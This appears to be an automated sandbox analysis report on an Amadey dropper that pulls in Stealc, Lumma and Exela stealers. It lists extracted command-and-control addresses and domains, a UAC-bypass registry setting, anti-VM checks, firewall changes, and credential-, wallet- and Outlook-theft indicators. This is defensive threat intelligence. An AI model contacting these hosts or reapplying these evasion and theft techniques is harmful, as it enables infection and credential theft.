amadey | 912b1bd940b6b3bace99c7b4cd750721df1333c0850ce989beb8c13f5dfb3f07

Analysis

max time kernel
148s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
03-12-2024 00:13

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

file.exe
Size

1.8MB
MD5

1757e6ef55b0848a7ea67c1d14a8ab4a
SHA1

f289f75005403bb17dff08acad0b56fdc88acc69
SHA256

912b1bd940b6b3bace99c7b4cd750721df1333c0850ce989beb8c13f5dfb3f07
SHA512

49948fade30ad1e6c492560fc241770ce58e6114c3f73ecc638f7337088f536c5aa538483dfbcddd5c9e42f3267000d9d2398b06023bb8187790634257de749e
SSDEEP

24576:QGzutHHCxaEBVNJjV8vasWOBMh2GX7xFO9tX3eTgSZyaKTuC0YU6rhO:Q880VN38vIOBM8GX7y9teTe02

Score

10^/10

amadey exelastealer lumma stealc default_valenciga fed3aa collection credential_access defense_evasion discovery evasion execution persistence privilege_escalation spyware stealer trojan

Malware Config

Extracted

Family

amadey

Version

4.41

Botnet

fed3aa

http://185.215.113.16

Attributes

install_dir
44111dbc49
install_file
axplong.exe
strings_key
8d0ad6945b1a30a186ec2d30be6db0b5
url_paths
/Jo89Ku7d/index.php

rc4.plain

Extracted

Family

stealc

Botnet

default_valenciga

http://185.215.113.17

Attributes

url_path
/2fb6c2cc8dce150a.php

Extracted

Family

lumma

https://drive-connect.cyou

https://crib-endanger.sbs

https://faintbl0w.sbs

https://300snails.sbs

https://bored-light.sbs

https://3xc1aimbl0w.sbs

https://pull-trucker.sbs

https://fleez-inc.sbs

https://thicktoys.sbs

Extracted

Family

lumma

https://drive-connect.cyou/api

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Amadey family
amadey
Exela Stealer
Exela Stealer is an open source stealer originally written in .NET and later transitioned to Python that was first observed in August 2023.
stealer exelastealer
Exelastealer family
exelastealer
Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma
Stealc
Stealc is an infostealer written in C++.
stealer stealc
Stealc family
stealc

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 1448 created 2652	1448	nSoft.exe	44

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	powershell.exe

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	e4ba0b926b.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	nSoft.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplong.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplong.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	file.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplong.exe

Blocklisted process makes network request 5 IoCs

flow	pid	Process
101	2588	powershell.exe
103	704	powershell.exe
107	704	powershell.exe
109	4672	rundll32.exe
114	704	powershell.exe

Downloads MZ/PE file

Modifies Windows Firewall 2 TTPs 2 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
4348	netsh.exe
600	netsh.exe

Checks BIOS information in registry 2 TTPs 12 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	e4ba0b926b.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	nSoft.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	nSoft.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	file.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	file.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	e4ba0b926b.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplong.exe

Checks computer location settings 2 TTPs 8 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	am209.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	defnur.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	Properties.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	7749.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	file.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	axplong.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	AllNew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	ATLEQQXO.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
1096	cmd.exe
4520	powershell.exe

Executes dropped EXE 20 IoCs

pid	Process
3280	axplong.exe
3584	stealc_default2.exe
4200	alex2022.exe
1680	alex2022.exe
2348	e4ba0b926b.exe
864	AllNew.exe
4948	Gxtuum.exe
1032	trru7rd2.exe
1456	ATLEQQXO.exe
464	pyexec.exe
3432	roblox1.exe
4148	stub.exe
2668	pyexec.exe
4840	am209.exe
2724	defnur.exe
1448	nSoft.exe
2744	Properties.exe
3500	7749.exe
5920	axplong.exe
5604	axplong.exe

Identifies Wine through registry keys 2 TTPs 5 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Wine	axplong.exe
Key opened	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Wine	file.exe
Key opened	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Wine	axplong.exe
Key opened	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Wine	e4ba0b926b.exe
Key opened	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Wine	axplong.exe

Loads dropped DLL 38 IoCs

pid	Process
3584	stealc_default2.exe
3584	stealc_default2.exe
464	pyexec.exe
4148	stub.exe
4148	stub.exe
4148	stub.exe
4148	stub.exe
4148	stub.exe
4148	stub.exe
4148	stub.exe
4148	stub.exe
4148	stub.exe
4148	stub.exe
4148	stub.exe
4148	stub.exe
4148	stub.exe
4148	stub.exe
4148	stub.exe
4148	stub.exe
4148	stub.exe
4148	stub.exe
4148	stub.exe
4148	stub.exe
4148	stub.exe
4148	stub.exe
4148	stub.exe
4148	stub.exe
4148	stub.exe
4148	stub.exe
4148	stub.exe
4148	stub.exe
4148	stub.exe
4148	stub.exe
4148	stub.exe
4148	stub.exe
2668	pyexec.exe
4672	rundll32.exe
5468	uzfvalidate.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001

Accesses Microsoft Outlook profiles 1 TTPs 42 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook	powershell.exe
Key opened	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook	powershell.exe
Key opened	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	powershell.exe
Key queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	powershell.exe
Key queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	powershell.exe
Key queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	powershell.exe
Key queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	powershell.exe
Key opened	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	powershell.exe
Key opened	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	powershell.exe
Key queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook	powershell.exe
Key queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	powershell.exe
Key opened	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	powershell.exe
Key queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook	powershell.exe
Key opened	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	powershell.exe
Key queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook	powershell.exe
Key queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	powershell.exe
Key queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook	powershell.exe
Key queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	powershell.exe
Key queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	powershell.exe
Key opened	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	powershell.exe
Key queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook	powershell.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	nSoft.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2588	powershell.exe
704	powershell.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
71	ip-api.com

Network Service Discovery 1 TTPs 2 IoCs

Attempt to gather information on host's network.

discovery

Network Service Discovery

T1046

pid	Process
1528	cmd.exe
656	ARP.EXE

An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs

pid	Process
372	cmd.exe
3268	cmd.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File created	C:\Windows\System32\bc170e2e-cb5e-4a19-9e43-8899c9094498.ps1	powershell.exe

Enumerates processes with tasklist 1 TTPs 3 IoCs

discovery

Process Discovery

T1057

pid	Process
3308	tasklist.exe
1160	tasklist.exe
1572	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
2876	cmd.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs

pid	Process
4784	file.exe
3280	axplong.exe
2348	e4ba0b926b.exe
1448	nSoft.exe
5920	axplong.exe
5604	axplong.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 4200 set thread context of 1680	4200	alex2022.exe	88
PID 2668 set thread context of 852	2668	pyexec.exe	181

Drops file in Windows directory 3 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\axplong.job	file.exe
File created	C:\Windows\Tasks\Gxtuum.job	AllNew.exe
File created	C:\Windows\Tasks\defnur.job	am209.exe

Launches sc.exe 1 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
884	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Embeds OpenSSL 2 IoCs

Embeds OpenSSL, may be used to circumvent TLS interception.

resource	yara_rule
behavioral2/files/0x000a000000023b8b-180.dat	embeds_openssl
behavioral2/files/0x0007000000023c66-303.dat	embeds_openssl

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

Program crash 2 IoCs

pid	pid_target	Process	procid_target
4272	1680	WerFault.exe	88
4360	1680	WerFault.exe	88

System Location Discovery: System Language Discovery 1 TTPs 18 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	alex2022.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	e4ba0b926b.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	trru7rd2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	pyexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	file.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ATLEQQXO.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nSoft.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	stealc_default2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Gxtuum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	pyexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	alex2022.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AllNew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	am209.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	defnur.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	axplong.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
864	cmd.exe
588	netsh.exe

System Network Connections Discovery 1 TTPs 1 IoCs

Attempt to get a listing of network connections.

discovery

System Network Connections Discovery

T1049

pid	Process
5116	NETSTAT.EXE

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	stealc_default2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	stealc_default2.exe

Collects information from the system 1 TTPs 1 IoCs

Uses WMIC.exe to find detailed system information.

Data from Local System

T1005

pid	Process
1920	WMIC.exe

Gathers network information 2 TTPs 2 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
1500	ipconfig.exe
5116	NETSTAT.EXE

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
612	systeminfo.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
3320	taskkill.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 41 IoCs

pid	Process
4784	file.exe
4784	file.exe
3280	axplong.exe
3280	axplong.exe
3584	stealc_default2.exe
3584	stealc_default2.exe
2348	e4ba0b926b.exe
2348	e4ba0b926b.exe
3584	stealc_default2.exe
3584	stealc_default2.exe
464	pyexec.exe
4520	powershell.exe
4520	powershell.exe
4520	powershell.exe
1448	nSoft.exe
1448	nSoft.exe
1448	nSoft.exe
1448	nSoft.exe
1448	nSoft.exe
1448	nSoft.exe
320	svchost.exe
320	svchost.exe
320	svchost.exe
320	svchost.exe
2668	pyexec.exe
2668	pyexec.exe
2668	pyexec.exe
2588	powershell.exe
2588	powershell.exe
2588	powershell.exe
704	powershell.exe
704	powershell.exe
704	powershell.exe
852	cmd.exe
852	cmd.exe
852	cmd.exe
852	cmd.exe
5920	axplong.exe
5920	axplong.exe
5604	axplong.exe
5604	axplong.exe

Suspicious behavior: MapViewOfSection 2 IoCs

pid	Process
2668	pyexec.exe
852	cmd.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	2864	WMIC.exe
Token: SeSecurityPrivilege	2864	WMIC.exe
Token: SeTakeOwnershipPrivilege	2864	WMIC.exe
Token: SeLoadDriverPrivilege	2864	WMIC.exe
Token: SeSystemProfilePrivilege	2864	WMIC.exe
Token: SeSystemtimePrivilege	2864	WMIC.exe
Token: SeProfSingleProcessPrivilege	2864	WMIC.exe
Token: SeIncBasePriorityPrivilege	2864	WMIC.exe
Token: SeCreatePagefilePrivilege	2864	WMIC.exe
Token: SeBackupPrivilege	2864	WMIC.exe
Token: SeRestorePrivilege	2864	WMIC.exe
Token: SeShutdownPrivilege	2864	WMIC.exe
Token: SeDebugPrivilege	2864	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2864	WMIC.exe
Token: SeRemoteShutdownPrivilege	2864	WMIC.exe
Token: SeUndockPrivilege	2864	WMIC.exe
Token: SeManageVolumePrivilege	2864	WMIC.exe
Token: 33	2864	WMIC.exe
Token: 34	2864	WMIC.exe
Token: 35	2864	WMIC.exe
Token: 36	2864	WMIC.exe
Token: SeDebugPrivilege	3308	tasklist.exe
Token: SeIncreaseQuotaPrivilege	2864	WMIC.exe
Token: SeSecurityPrivilege	2864	WMIC.exe
Token: SeTakeOwnershipPrivilege	2864	WMIC.exe
Token: SeLoadDriverPrivilege	2864	WMIC.exe
Token: SeSystemProfilePrivilege	2864	WMIC.exe
Token: SeSystemtimePrivilege	2864	WMIC.exe
Token: SeProfSingleProcessPrivilege	2864	WMIC.exe
Token: SeIncBasePriorityPrivilege	2864	WMIC.exe
Token: SeCreatePagefilePrivilege	2864	WMIC.exe
Token: SeBackupPrivilege	2864	WMIC.exe
Token: SeRestorePrivilege	2864	WMIC.exe
Token: SeShutdownPrivilege	2864	WMIC.exe
Token: SeDebugPrivilege	2864	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2864	WMIC.exe
Token: SeRemoteShutdownPrivilege	2864	WMIC.exe
Token: SeUndockPrivilege	2864	WMIC.exe
Token: SeManageVolumePrivilege	2864	WMIC.exe
Token: 33	2864	WMIC.exe
Token: 34	2864	WMIC.exe
Token: 35	2864	WMIC.exe
Token: 36	2864	WMIC.exe
Token: SeDebugPrivilege	3320	taskkill.exe
Token: SeDebugPrivilege	1160	tasklist.exe
Token: SeDebugPrivilege	4520	powershell.exe
Token: SeIncreaseQuotaPrivilege	1920	WMIC.exe
Token: SeSecurityPrivilege	1920	WMIC.exe
Token: SeTakeOwnershipPrivilege	1920	WMIC.exe
Token: SeLoadDriverPrivilege	1920	WMIC.exe
Token: SeSystemProfilePrivilege	1920	WMIC.exe
Token: SeSystemtimePrivilege	1920	WMIC.exe
Token: SeProfSingleProcessPrivilege	1920	WMIC.exe
Token: SeIncBasePriorityPrivilege	1920	WMIC.exe
Token: SeCreatePagefilePrivilege	1920	WMIC.exe
Token: SeBackupPrivilege	1920	WMIC.exe
Token: SeRestorePrivilege	1920	WMIC.exe
Token: SeShutdownPrivilege	1920	WMIC.exe
Token: SeDebugPrivilege	1920	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1920	WMIC.exe
Token: SeRemoteShutdownPrivilege	1920	WMIC.exe
Token: SeUndockPrivilege	1920	WMIC.exe
Token: SeManageVolumePrivilege	1920	WMIC.exe
Token: 33	1920	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4784 wrote to memory of 3280	4784	file.exe	83
PID 4784 wrote to memory of 3280	4784	file.exe	83
PID 4784 wrote to memory of 3280	4784	file.exe	83
PID 3280 wrote to memory of 3584	3280	axplong.exe	85
PID 3280 wrote to memory of 3584	3280	axplong.exe	85
PID 3280 wrote to memory of 3584	3280	axplong.exe	85
PID 3280 wrote to memory of 4200	3280	axplong.exe	86
